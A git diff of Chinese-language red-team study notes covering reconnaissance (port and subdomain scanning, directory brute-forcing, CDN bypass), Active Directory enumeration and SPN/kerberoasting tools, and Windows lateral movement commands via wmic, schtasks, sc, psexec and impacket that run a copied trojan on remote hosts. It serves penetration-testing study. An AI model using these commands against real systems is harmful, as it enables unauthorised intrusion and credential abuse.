+**工具**
+- [0Kee-Team/crawlergo](https://github.com/0Kee-Team/crawlergo)
+ ```bash
+ # 假设你的chromium安装在 /tmp/chromium/ ,开启最大10标签页,爬取AWVS靶场
+ ./crawlergo -c /tmp/chromium/chrome -t 10 http://testphp.vulnweb.com/
+
+ # 使用代理
+ ./crawlergo -c /tmp/chromium/chrome -t 10 --request-proxy socks5://127.0.0.1:7891 http://testphp.vulnweb.com/
+ ```
+ - [timwhitez/crawlergo_x_XRAY](https://github.com/timwhitez/crawlergo_x_XRAY) - crawlergo 动态爬虫结合长亭 XRAY 扫描器的被动扫描功能
+ - [ox01024/Xray_and_crwlergo_in_server](https://github.com/ox01024/Xray_and_crwlergo_in_server) - xray与crwlergo联动+server酱推送
---
@@ -157,11 +192,10 @@
## 端口扫描
-**tips**
-```
+**Tips**
+
1. 有时候扫描主机会碰到显示大量开放端口,这种可能都是虚的,是 waf 在起作用.
2. nmap 在有些场景下不一定能把所有开放端口扫出,这时候换一个工具说不定有奇效.
-```
```bash
# scanning the 65535 ports
@@ -187,8 +221,17 @@ done
- [nmap 笔记](../../工具/Nmap.md)
- **[masscan](https://github.com/robertdavidgraham/masscan)**
```bash
- # 常用
- masscan 127.0.0.0/24 -p20,21,22,23,80,161,443,873,2181,3389,6379,7001,8000,8009,8080,9000,9009,9090,9200,9300,10000,50070 > results.txt
+ # web常用
+ masscan 127.0.0.0/24 -p80,161,443,873,2181,6379,7001,8000,8009,8080,9000,9009,9090,9200,9300,10000,50070 > results.txt
+
+ # 远程登录
+ masscan 127.0.0.0/24 -p22,23,3389,5632,5800,5900,5901 > results.txt
+
+ # 文件服务
+ masscan 127.0.0.0/24 -p20,21,445,873,2049 > results.txt
+
+ # 数据库
+ masscan 127.0.0.0/24 -p1433,1521,3306,4100,5000,5432,5984,6379,11211,27017,27018 > results.txt
# 单端口扫描
Masscan 127.0.0.0/24 -p443
@@ -223,25 +266,169 @@ done
---
+## 主机信息
+
+- [Linux主机信息收集](../../../运维/Linux/笔记/信息.md)
+- [Windows主机信息收集](../../../运维/Windows/笔记/信息.md)
+
+---
+
## 域信息
-### SPN扫描
+**域信息收集相关工具/脚本**
+- [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
+- [BloodHound](https://github.com/BloodHoundAD/BloodHound) - 域环境分析工具
+ - 参考文章 : [域渗透分析工具BloodHound 1.5.2入门实战](https://www.freebuf.com/sectool/179002.html)
+- [impacket](https://github.com/SecureAuthCorp/impacket) - 一个网络协议工具包
+ ```bash
+ git clone https://github.com/CoreSecurity/impacket.git
+ cd impacket/
+ python setup.py install
+ cd impacket/examples
+ ```
+ - Ping.py
-要使用 Active Directory 作为 Kerberos 实现,可以使用 `setspn` 命令来注册 SPN。要运行此命令,必须满足下列条件:
+ 一个简单的 ICMP ping 脚本,使用 ICMP echo 和 echo-reply 数据包检查主机状态。
+ ```
+ ./ping.py [Source IP] [Destination IP]
+ ```
+ - Lookupsid.py
+
+ 通过 [MS-LSAT] MSRPC 接口的 Windows SID bruteforcer 示例,旨在查找远程用户/组。
+ ```
+ ./lookupsid.py test/Administrator:Abcd1234@192.168.1.100
+ ```
+ - Rpcdump.py
+
+ 该脚本将转储在目标上注册的 RPC 端点和字符串 bindings 列表。它也会尝试将它们与一些知名的端点进行匹配。
+ ```
+ ./rpcdump.py test/Administrator:Abcd1234@192.168.1.100
+ ```
+ - Samrdump.py
+
+ 与 MSRPC 套件中的安全帐户管理器远程接口通信的应用程序。它将为我们列出目标系统上的用户帐户,可用资源共享以及通过此服务导出的其他敏感信息
+ ```
+ ./samrdump.py test/Administrator:Abcd1234@192.168.1.100
+ ```
+ - Wmiquery.py
+
+ 它允许发出 WQL 查询并获取目标系统 WMI 对象的描述信息。
+ ```
+ ./wmiquery.py test/Administrator:Abcd1234@192.168.1.100
+ ```
+ - getArch.py
+
+ 该脚本将连接目标(或目标列表上的)计算机,并使用已记录的 MSRPC 特征收集由(ab)安装的操作系统架构类型。
+ ```
+ ./getArch.py -target 192.168.1.100
+ ```
+
+---
+
+### 域环境
+
+**获取当前计算机名,全名,用户名,系统版本,工作站域,登陆域**
+```
+net view
+net config Workstation
+klist
+whoami/user
+```
+
+**查询所有域主机名**
+```
+dsquery computer
+```
+
+**查看所有域**
+```
+net view /domain
+```
+
+**查看域中的用户名**
+```
+net user /domain
+dsquery user
+```
+
+**查询域组名称**
+```
+net group /domain
+```
+
+**查询域联系人**
+```
+dsquery contact
+```
+
+**查询域中所有的组**
+```
+dsquery group
+```
+
+**查询域中所有的组织单元**
+```
+dsquery ou
+```
+
+**查询域中所有的站点**
+```
+dsquery site
+```
+
+**查询指定域主机名**
+```
+dsquery computer -name win* -desc desktop -limit 0
+```
+
+**查询n周未活动的域主机名**
+```
+dsquery computer -inactive n -limit 0
+```
+
+**查询n天内未更改密码的域主机名**
+```
+dsquery computer -stalepwd n
+```
+
+**查询指定域的域主机名**
+```
+dsquery computer -s ip -u username -p password -limit 0
+```
+**查询域中的配额规范**
+```
+dsquery quota
+```
+
+**查询域中的分区对象**
+```
+dsquery partition
+```
+
+**查看域时间**
+```
+net time /domain
+```
+
+#### SPN扫描
+
+SPN 是服务在使用 Kerberos 身份验证的网络上的唯一标识符。 它由服务类、主机名和端口组成。 在使用 Kerberos 身份验证的网络中,必须在内置计算机帐户(如 NetworkService 或 LocalSystem)或用户帐户下为服务器注册 SPN。 对于内置帐户,SPN 将自动进行注册。 但是,如果在域用户帐户下运行服务,则必须为要使用的帐户手动注册 SPN。
+
+SPN 扫描的主要好处是,SPN 扫描不需要连接到网络上的每个IP来检查服务端口,SPN 通过 LDAP 查询向域控执行服务发现,spn 查询是 kerberos 票据行为一部分,,域内的主机都能查询 SPN,因此比较难检测 SPN 扫描。所以在域内不用做端口扫描也可以隐蔽地探测域内的服务。当利用 SPN 扫描找到域管登录过的系统,对渗透权限扩展有很大的帮助。
+
+要使用 Active Directory 作为 Kerberos 实现,可以使用 `setspn` 命令来注册 SPN。要运行此命令,必须满足下列条件:
- 必须登录到域控制器
- 必须运行提升了特权的命令提示符(以管理员身份运行)
- 必须是 Domain Admins 组的成员(或者域管理员已授予您适当的许可权)
SPN 分为两种:
-
- 当一个服务的权限为 Local System 或 Network Service,则 SPN 注册在域内机器帐户(Computers)下
- 当一个服务的权限为一个域用户,则 SPN 注册在域用户帐户(Users)下
-SPN 对域控制器进行 LDAP 查询,是 Kerberos 的行为之一,域内的主机都能查询 SPN。
-
-所以在域内不用做端口扫描也可以隐蔽地探测域内的服务。当利用 SPN 扫描找到域管登录过的系统,对渗透权限扩展有很大的帮助。
+---
+一些注意的服务 :
- AGPMServer:通常具有所有 GPO 的完全控制权。
- MSSQL/MSSQLSvc:具有管理员权限的 SQL 服务器通常会有一些有趣的数据。
- FIMService:通常对多个 AD 林具有管理权限。
@@ -269,10 +456,10 @@ setspn -A MSSQLSvc/SqlServer.god.org dbadmin
//查看当前域内的所有SPN
setspn.exe -q */*
-//查看god域内的所有SPN
+//查看 god 域内的所有SPN
setspn.exe -T god -q */*
-//查看 dbadmin账户的SPN
+//查看 dbadmin 账户的 SPN
setspn -l dbadmin
```
@@ -294,59 +481,81 @@ CN=dbadmin,CN=Users,DC=god,DC=org
> 注册在域用户账户下的 SPNMSSQLSvc/SqlServer.god.org 和 kadmin/changepw
-**GetUserSPNs**
-- https://github.com/nidem/kerberoast
- ```
- .\GetUserSPNs.ps1
- cscript.exe GetUserSPNs.vbs # 利用GetUserSPNs.vbs进行SPN信息查询
- ```
+**SPN扫描相关工具**
+- **GetUserSPNs**
+ - https://github.com/nidem/kerberoast
+ ```
+ .\GetUserSPNs.ps1
+ cscript.exe GetUserSPNs.vbs 利用 GetUserSPNs.vbs 进行 SPN 信息查询
+ ```
-**PowerView**
-- https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
- ```powershell
- PS C:\Users\Administrator\Desktop\Recon> Import-Module .\PowerView.ps1
- PS C:\Users\Administrator\Desktop\Recon> Get-NetUser -SPN
- ```
+- **PowerView**
+ - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
+ ```powershell
+ PS C:\Users\Administrator\Desktop\Recon> Import-Module .\PowerView.ps1
+ PS C:\Users\Administrator\Desktop\Recon> Get-NetUser -SPN
+ ```
-**Powershell AD Recon**
-- https://github.com/PyroTek3/PowerShell-AD-Recon
- ```powershell
- //如查看MSSQL(其他的同理):
+- **Powershell AD Recon**
+ - https://github.com/PyroTek3/PowerShell-AD-Recon
+ ```powershell
+ //如查看MSSQL(其他的同理):
- //导入脚本
- Import-Module .\Discover-PSMSSQ
- LServers.ps1
- //查找MSSQL所有实例
- Discover-PSMSSQLServers
- ```
+ //导入脚本
+ Import-Module .\Discover-PSMSSQLServers.ps1
+ //查找MSSQL所有实例
+ Discover-PSMSSQLServers
+ ```
-**PowerShellery**
-- https://github.com/nullbind/Powershellery
- ```powershell
- PS C:\Users\dbadmin\Desktop\Get-SPN> Import-Module .\Get-SPN.psm1
- PS C:\Users\dbadmin\Desktop\Get-SPN> Get-SPN -type service -search "*"
-
- //查找所有的SPN服务
- Get-SPN -type service -search "*" -List yes | Format-Table
- //查找MSSQL服务
- Get-SPN -type service -search "MSSQLSvc*" -List yes
- //若在一个非域系统上,可以使用以下命令执行
- Get-SPN -type service -search "*" -List yes -DomainController 域控IP -Credential domainuser| Format-Table -Autosize
- ```
+- **PowerShellery**
+ - https://github.com/nullbind/Powershellery
+ ```powershell
+ PS C:\Users\dbadmin\Desktop\Get-SPN> Import-Module .\Get-SPN.psm1
+ PS C:\Users\dbadmin\Desktop\Get-SPN> Get-SPN -type service -search "*"
+
+ //查找所有的SPN服务
+ Get-SPN -type service -search "*" -List yes | Format-Table
+ //查找MSSQL服务
+ Get-SPN -type service -search "MSSQLSvc*" -List yes
+ //若在一个非域系统上,可以使用以下命令执行
+ Get-SPN -type service -search "*" -List yes -DomainController 域控IP -Credential domainuser| Format-Table -Autosize
+ ```
-**RiskySPN**
-- https://github.com/cyberark/RiskySPN
- ```powershell
- Import-Module .\RiskySPNs.psm1
- Find-PotentiallyCrackableAccounts
- ```
+- **RiskySPN**
+ - https://github.com/cyberark/RiskySPN
+ ```powershell
+ Import-Module .\RiskySPNs.psm1
+ Find-PotentiallyCrackableAccounts
+ ```
-**Adfind**
-- http://www.joeware.net/freetools/tools/adfind/
- ```
- Adfind -f "ServicePrincipalName=MSSQLSvc*"
- Adfind -h 域控地址 -sc spn:*
- ```
+- **Adfind**
+ - http://www.joeware.net/freetools/tools/adfind/
+ ```
+ Adfind -f "ServicePrincipalName=MSSQLSvc*"
+ Adfind -h 域控地址 -sc spn:*
+ ```
+
+**相关文章**
+- [Locate and Attack Domain SQL Servers without Scanning](https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/) - 通过 SPN 扫描域内 MSSQL 服务
+- [SPN Scanning – Service Discovery without Network Port Scanning](https://adsecurity.org/?p=1508)
+
+---
+
+### 域控
+
+**查找域管理员**
+```
+net group "Domain Admins" /domain
+```
+
+**查找域控**
+```
+ping test.com 查看域控的 IP
+net time /domain 查看时间,域控机器名
+nltest /DCLIST:test.com 查看域控名字
+net group "Domain Controllers" /domain
+dsquery server
+```
---
@@ -394,12 +603,7 @@ CN=dbadmin,CN=Users,DC=god,DC=org
- 多地 ping 域名
利用在线网站服务多地 ping 测试
- - [CDN Finder tool - CDN Planet](https://www.cdnplanet.com/tools/cdnfinder/)
- - [CDN检测](https://myssl.com/cdn_check.html)
- - [多个地点Ping服务器,网站测速 - 站长工具](http://ping.chinaz.com/)
- - [网站测速工具_超级ping _多地点ping检测 - 爱站网](https://ping.aizhan.com/)
- - [just-ping › Ping an internet host from 50 locations worldwide - iTools](http://itools.com/tool/just-ping)
- - [](https://dnsmap.io/) - 检查来自世界各地的多个DNS名称服务器和解析器的域名或主机名的当前IP
+ - [ping工具](../../../Plan/Web-Tools.md#ping工具)
- "常识"判断
@@ -422,9 +626,7 @@ CN=dbadmin,CN=Users,DC=god,DC=org
> 上面下面这么多方法里,这个应该是成功率较高的了
通过查询历史的 DNS 解析 IP,有可能得到真实 IP
- - https://x.threatbook.cn/nodev4/vb4/list
- - https://viewdns.info/iphistory/
- - https://securitytrails.com/
+ - [DNS记录](../../../Plan/Web-Tools.md#DNS记录)
- SSL 证书
- [CloudFlair: Bypassing Cloudflare using Internet-wide scan data](https://blog.christophetd.fr/bypassing-cloudflare-using-internet-wide-scan-data/)
@@ -462,6 +664,9 @@ CN=dbadmin,CN=Users,DC=god,DC=org
**工具**
- [shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) - 非常优秀的子域名爆破工具,推荐
+ ```
+ python3 oneforall.py --target example.com run
+ ```
- [Threezh1/JSFinder](https://github.com/Threezh1/JSFinder) - 通过在 js 文件中提取 URL,子域名
- [LangziFun/LangSrcCurise](https://github.com/LangziFun/LangSrcCurise) - 持续性的子域名监控
- [tomnomnom/assetfinder](https://github.com/tomnomnom/assetfinder) - GO语言编写,从社交网站、威胁搜索引擎获取子域的工具
@@ -478,6 +683,10 @@ CN=dbadmin,CN=Users,DC=god,DC=org
- [MilindPurswani/Syborg](https://github.com/MilindPurswani/Syborg) - 一个递归DNS域枚举器,它既不是主动的也不是完全被动的。该工具仅构造一个域名,然后使用指定的DNS服务器查询该域名。
- [guelfoweb/knock](https://github.com/guelfoweb/knock) - python 编写的 DNS 枚举工具,支持对 VirusTotal 子域的查询
- [tismayil/rsdl](https://github.com/tismayil/rsdl) - go语言编写,采用 ping 方式的子域扫描工具
+- [joinsec/BadDNS](https://github.com/joinsec/BadDNS) - BadDNS 是一款使用 Rust 开发的使用公共 DNS 服务器进行多层子域名探测的极速工具。
+ ```
+ ./baddns -t target.txt -s domaindict-170W.txt -d depthdict.txt
+ ```
**Tips**
@@ -519,31 +728,34 @@ CN=dbadmin,CN=Users,DC=god,DC=org
- [熟练使用各类敏感目录文件扫描工具](https://klionsec.github.io/2014/12/16/dirscan-tools/)
**工具**
+- [ffuf/ffuf](https://github.com/ffuf/ffuf) - go 写的 web fuzz 工具,很好用,推荐
+ ```
+ ./ffuf -w dic.txt -u http://testphp.vulnweb.com/FUZZ
+ ```
- [wfuzz](../../工具/Wfuzz.md)
-- [OJ/gobuster](https://github.com/OJ/gobuster) - go 写的枚举工具可爆破目录、DNS、虚拟主机名
-- [nccgroup/dirble](https://github.com/nccgroup/dirble) - rust 写的目录扫描工具
+- [OJ/gobuster](https://github.com/OJ/gobuster) - go 写的枚举工具可爆破目录、DNS、虚拟主机名,报错较多
+ ```
+ ./gobuster dir -u http://testphp.vulnweb.com/ -w dic.txt
+ ```
+- [nccgroup/dirble](https://github.com/nccgroup/dirble) - rust 写的目录扫描工具,效果一般
+ ```
+ ./dirble http://testphp.vulnweb.com/ -w dic.txt
+ ```
- [maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) - python 写的目录扫描工具,效果一般
- [Nekmo/dirhunt](https://github.com/Nekmo/dirhunt) - python 写的目录扫描工具,效果一般
- [Xyntax/DirBrute](https://github.com/Xyntax/DirBrute) - python 写的目录扫描工具,效果一般,且长期未更新
- [H4ckForJob/dirmap](https://github.com/H4ckForJob/dirmap) - python 写的 web 目录、文件扫描工具
-- [ffuf/ffuf](https://github.com/ffuf/ffuf) - go 写的 web fuzz 工具
**Tips**
-使用 burp 的 Intruder 爆破模块扫描目录也是以一种很好的选择,当其他扫描器没有结果时不妨尝试一下。
+- 使用 burp 的 Intruder 爆破模块扫描目录也是以一种很好的选择,当其他扫描器没有结果时不妨尝试一下。
---
## 指纹
-**在线**
-- [云悉 WEB 资产梳理|在线 CMS 指纹识别平台 - 云悉安全](http://www.yunsee.cn/)
-- [Sucuri SiteCheck - Free Website Security Check & Malware Scanner](https://sitecheck.sucuri.net/)
-- [Bad site specified](https://toolbar.netcraft.com/site_report?url=/)
-- [Site Info Tool - Website Information Lookup Tool](http://www.siteinfotool.com/)
-- [在线指纹识别,在线 cms 识别小插件--BugScaner](http://whatweb.bugscaner.com/look/)
-- [YFCMF 内容管理框架 YFCMF 内容管理框架](http://finger.tidesec.net/)
-- [BuiltWith Technology Lookup](https://searchcode.com/) - 找出网站使用什么搭建的
+**在线工具**
+- [指纹](../../../Plan/Web-Tools.md#指纹)
**文章**
- [WAF 指纹探测及识别技术](https://www.freebuf.com/articles/web/21744.html)
@@ -566,57 +778,26 @@ CN=dbadmin,CN=Users,DC=god,DC=org
## 旁站
**在线工具**
-- https://x.threatbook.cn/nodev4/vb4/list
-- https://dns.aizhan.com/
-- https://www.robtex.com/
-- http://www.webscan.cc/
-- http://www.114best.com/ip/
-- http://www.5kik.com/c/
-- https://phpinfo.me/bing.php
-- https://dnsdumpster.com/
-- https://viewdns.info/iphistory/
-- https://securitytrails.com/
+- [旁站](../../../Plan/Web-Tools.md#旁站)
---
## whois-备案
**在线 whois 查询**
-- http://wq.apnic.net/apnic-bin/whois.pl
-- https://centralops.net/co/
-- https://www.register.com/whois.rcmx
-- https://www1.domain.com/whois/whois.bml
-- https://whois.net/
-- https://whois.domaintools.com/
-- https://who.is/
-- https://www.t00ls.net/domain.html
-- https://www.whois.com.au/whois/abn.html
-- http://whois.webmasterhome.cn/
-- https://whois.aliyun.com/
-- https://who.is/whois/xxx.com
-- https://whois.icann.org/zh/lookup
-- http://whoissoft.com/
-- http://whois.chinaz.com/
-- https://www.whois.com/
-- http://whois.domaintools.com/
-- https://whois.icann.org/en
-- https://www.whoxy.com/reverse-whois/
-- https://domainbigdata.com/
-- https://whoer.net/checkwhois
-- https://viewdns.info/whois/
+- [whois查询](../../../Plan/Web-Tools.md#whois查询)
+
+**在线备案查询**
+- [备案查询](../../../Plan/Web-Tools.md#备案查询)
**whois 工具**
- http://www.freebuf.com/articles/network/107372.html
-**备案查询**
-- http://www.beianbeian.com/
-- http://beian.gov.cn/portal/recordQuery
-- http://www.miitbeian.gov.cn/publish/query/indexFirst.action
-
---
# 另类
## 截图
+
**工具**
- [FortyNorthSecurity/EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) - 获取网站的屏幕截图,提供一些服务器标头信息,并在可能的情况下识别默认凭据.(要下的依赖挺多的,比较费功夫)
- [michenriksen/aquatone](https://github.com/michenriksen/aquatone) - 用于对大量主机上的网站进行可视化检查的工具
@@ -628,4 +809,5 @@ CN=dbadmin,CN=Users,DC=god,DC=org
# OSINT
不要脸的推荐下自己的项目,嘿嘿嘿😊
+
- [Digital-Privacy](https://github.com/ffffffff0x/Digital-Privacy#OSINT) - 一个关于数字隐私搜集、保护、清理集一体的方案,外加开源信息收集(OSINT)对抗
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\215\217\350\256\256\345\256\211\345\205\250.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\215\217\350\256\256\345\256\211\345\205\250.md"
index 486b45a6..2144f203 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\215\217\350\256\256\345\256\211\345\205\250.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\215\217\350\256\256\345\256\211\345\205\250.md"
@@ -137,6 +137,14 @@
**文章**
- [SMB协议(445端口)渗透测试](https://mp.weixin.qq.com/s/_SGJWfjHhR3m_Ky31ZGSxQ)
+**信息收集**
+- MSF 模块
+ ```
+ use auxiliary/scanner/smb/smb_version
+ set rhosts xxx.xxx.xxx.xxx
+ run
+ ```
+
**暴力破解**
可以暴力破解来获得目标主机的 smb 访问。
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\220\216\346\270\227\351\200\217.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\220\216\346\270\227\351\200\217.md"
index d727643f..601d388e 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\220\216\346\270\227\351\200\217.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\220\216\346\270\227\351\200\217.md"
@@ -11,8 +11,11 @@
# 大纲
* **[GET_shell](#get_shell)**
- * [windows下获取shell](#windows下获取shell)
- * [linux下获取shell](#linux下获取shell)
+ * [Windows](#Windows)
+ * [Windows下获取shell](#windows下回弹shell)
+ * [Windows远程执行命令](#Windows远程执行命令)
+ * [Linux](#Linux)
+ * [Linux下获取shell](#linux下回弹shell)
* **[横向扩展](#横向扩展)**
* [PTH/PTK/PTT](#pthptkptt)
@@ -31,9 +34,10 @@
* **[权限维持](#权限维持)**
* **[windows域](#windows域)**
+ * [域认证基础知识](#域认证基础知识)
* [域内信息收集](#域内信息收集)
* [Exchange](#exchange)
- * [口令获取及破解](#口令获取及破解)
+ * [认证](#认证)
* [域提权](#域提权)
---
@@ -42,7 +46,9 @@
本部分总结一些获取 shell 的方法和过程
-## windows下获取shell
+## Windows
+
+### Windows下回弹shell
**文章**
- [Get Reverse-shell via Windows one-liner](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
@@ -296,7 +302,77 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
---
-## linux下获取shell
+### Windows远程执行命令
+
+**WMIC 远程运行命令**
+```cmd
+wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”
+```
+
+**powershell remoting 执行命令**
+
+- schtasks 计划任务远程运行
+ ```cmd
+ schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe
+ /sc once /st 00:00 /S host /RU System schtasks /run /tn foobar /S host
+ schtasks /F /delete /tn foobar /S host ## 清除 schtasks
+ ```
+
+- SC 添加服务远程运行命令
+ ```cmd
+ sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ## 新建服务,指向拷贝的木马路径
+ sc \\host start foobar ## 启动建立的服务
+ sc \\host delete foobar ## 完事后删除服务
+ ```
+
+**PStools 远程执行命令s**
+```cmd
+psexec.exe \\ip –accepteula -u username -p password program.exe
+```
+
+```
+psexec \\ip -u user -p passwd cmd /c dir D:\
+```
+
+**smbexec 远程执行命令**
+```cmd
+copy execserver.exe \\host\c$\windows\
+test.exe ip user password command netshare
+```
+
+**impacket**
+- https://github.com/SecureAuthCorp/impacket
+ ```bash
+ git clone https://github.com/CoreSecurity/impacket.git
+ cd impacket/
+ python setup.py install
+ cd impacket/examples
+ ```
+ - **Psexec.py**
+
+ Psexec.py 允许你在远程 Windows 系统上执行进程,复制文件,并返回处理输出结果。此外,它还允许你直接使用完整的交互式控制台执行远程 shell 命令(不需要安装任何客户端软件)。
+ ```
+ ./psexec.py test/Administrator:Abcd1234@192.168.1.100
+ ```
+
+ - **Wmiexec.py**
+
+ 它会生成一个使用 Windows Management Instrumentation 的半交互式 shell,并以管理员身份运行。你不需要在目标服务器
+ ```
+ ./wmiexec.py test/Administrator:Abcd1234@192.168.1.100
+ ```
+
+ - **Atexec.py**
+
+ 通过 Task Scheduler 服务在目标系统上执行命令,并返回输出结果。
+ ```
+ ./atexec.py test/Administrator:Abcd1234@192.168.1.100 whoami
+ ```
+
+---
+
+## Linux
+### Linux下回弹shell
**工具**
- [sameera-madushan/Print-My-Shell](https://github.com/sameera-madushan/Print-My-Shell) - 自动化生成各种类型的反向 Shell
@@ -494,9 +570,11 @@ strings reverse.war | grep jsp # in order to get the name of the file
---
# 横向扩展
+
## PTH/PTK/PTT
-详细内容见 [Windows渗透](./Windows渗透.md#PTHPTKPTT) PTH 部分
+- [PTH](./Windows渗透.md#PTH)
+- [PTT](./Windows渗透.md#PTT)
---
@@ -936,9 +1014,19 @@ copy \\192.168.28.128\c$\2.txt D:\test
# windows域
-## 域认证基础知识
+**域渗透相关文章(总结类)**
+- [我所了解的内网渗透——内网渗透知识大总结](https://www.anquanke.com/post/id/92646)
+
+## 域基础知识
-关于 windows 域认证的基本知识点可见笔记 [认证](../../../运维/windows/笔记/认证.md#域认证)
+**域认证**
+- 关于 windows 域认证的基本知识点可见笔记 [认证](../../../运维/windows/笔记/认证.md#域认证)
+
+**域环境**
+- 关于 windows 域环境组成的基本知识点可见笔记 [认证](../../../运维/windows/笔记/域.md)
+
+**域环境搭建**
+- 关于 windows 域认证的基本知识点可见笔记 [认证](../../../运维/windows/实验/Windows域搭建)
## 域内信息收集
@@ -974,13 +1062,9 @@ copy \\192.168.28.128\c$\2.txt D:\test
- POC | Payload | exp
- [Ridter/cve-2020-0688](https://github.com/Ridter/cve-2020-0688)
-## Hash
-
-- [Hash](./Windows渗透.md#Hash)
+## 认证
-## 卷影
-
-![](../../../../assets/img/才怪.png)
+- [认证](./Windows渗透.md#认证)
## 跨域
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\256\211\351\230\262\350\256\276\345\244\207\346\200\273\347\273\223.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\256\211\351\230\262\350\256\276\345\244\207\346\200\273\347\273\223.md"
index 5b76d587..42298a44 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\256\211\351\230\262\350\256\276\345\244\207\346\200\273\347\273\223.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\345\256\211\351\230\262\350\256\276\345\244\207\346\200\273\347\273\223.md"
@@ -619,6 +619,9 @@ urlencode 和 form-data POST 在提交数据的时候有两种方式,第一种
- POC | Payload | exp
- [trustedsec/cve-2019-19781](https://github.com/trustedsec/cve-2019-19781)
+**上海格尔安全认证网关管理系统**
+- [WooYun-2016-170003 上海格尔安全认证网关管理系统命令执行漏洞大礼包](http://php.evi1s.com/bugs/wooyun-2016-0170003.html)
+
---
## VPN
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\220\234\347\264\242\345\274\225\346\223\216Hacking.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\220\234\347\264\242\345\274\225\346\223\216Hacking.md"
index d875d6fb..48e28a53 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\220\234\347\264\242\345\274\225\346\223\216Hacking.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\220\234\347\264\242\345\274\225\346\223\216Hacking.md"
@@ -1,7 +1,7 @@
# 搜索引擎 Hacking
-
+
---
@@ -68,7 +68,7 @@ https://webcache.googleusercontent.com/search?q=cache:www.baidu.com
# Github
-
+
**文章**
@@ -194,7 +194,7 @@ https://searchcode.com/
# Google
-
+
**案例**
@@ -365,7 +365,7 @@ https://searchcode.com/
# Shodan
-
+
> Shodan 是目前最为知名的黑客搜索引擎,它是由计算机程序员约翰·马瑟利(John Matherly)于2009年推出的,他在2003年就提出了搜索与 Internet 链接的设备的想法。发展至今已经变成搜索资源最全,搜索性能最强的网络资产搜索引擎。简述下 shodan 的工作原理:通过其强大的爬虫能力每隔一定时间扫描全互联网设备并抓取相应的 banner 信息建立索引,通过这些巨大的数据,你基本可以找到任何你想象得到的连接到互联网的东西。
@@ -482,7 +482,7 @@ port:"2375" country:"JP" Docker # docker-remote-api未授权
# BinaryEdge
-
+
> BinaryEdge 是一家来自瑞士的公司提供的资产搜索引擎,其为企业提供网络安全,工程和数据科学解决方案的评估。它利用机器学习技术收集有关基础设施的信息,并将收集的数据与从提要中获得的数据相关联。功能包括通过将发现结果与安全工具结合后从联网设备和运行于它们的服务中提取数据来提供通知,警报和报告功能。·
@@ -517,7 +517,7 @@ product:"Dropbear sshd" # Product Dropbear sshd
# Censys
-
+
> Censys 搜索引擎能够扫描整个互联网,Censys 每天都会扫描 IPv4 地址空间,以搜索所有联网设备并收集相关的信息,并返回一份有关资源(如设备、网站和证书)配置和部署信息的总体报告。
@@ -547,7 +547,7 @@ autonomous_system.description: University # 系统描述
# Zoomeye
-
+
> ZoomEye 是北京知道创宇公司发布的网络空间侦测引擎,积累了丰富的网络扫描与组件识别经验。在此网络空间侦测引擎的基础上,结合“知道创宇”漏洞发现检测技术和大数据情报分析能力,研制出网络空间雷达系统,为政府、企事业及军工单位客户建设全球网络空间测绘提供技术支持及产品支撑。
@@ -598,7 +598,7 @@ city:tokyo + app:weblogic
# FoFa
-
+
> FOFA 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。
@@ -636,7 +636,7 @@ app="Solr" && title=="Solr Admin"
# Dnsdb
-
+
> 这是一个搜索全网络所有 DNS 服务器的搜索引擎。
@@ -681,7 +681,7 @@ IP 最大范围限制 65536 个
# 知风
-
+
> “知风”提出了一种互联网联网工控资产自动化分析方式,基于分析结果将可真正帮助用户了解目前接入互联网的工控资产是何企业所属,接入时间,系统名称等。利用“知风”积累的企业和系统数据,您使用“知风”时只需输入企业简称或系统简称,即可了解目标系统企业和系统是否有工控资产联网情况,借助“知风”您也可以了解您的企业、系统是否存在遭受互联网攻击的可能。
@@ -694,7 +694,7 @@ IP 最大范围限制 65536 个
# ONYPHE
-
+
> 很像Shodan,但除了扫描之外,它还可以从被动DNS查询、威胁列表查询和粘贴网站查询中抓取数据。不过免费版比起Shodan来说,它的局限性更大。
@@ -707,7 +707,7 @@ IP 最大范围限制 65536 个
# GreyNoise
-
+
> 类似 shodan
@@ -720,7 +720,7 @@ IP 最大范围限制 65536 个
# Thingful
-
+
> 仅针对物联网的搜索引擎
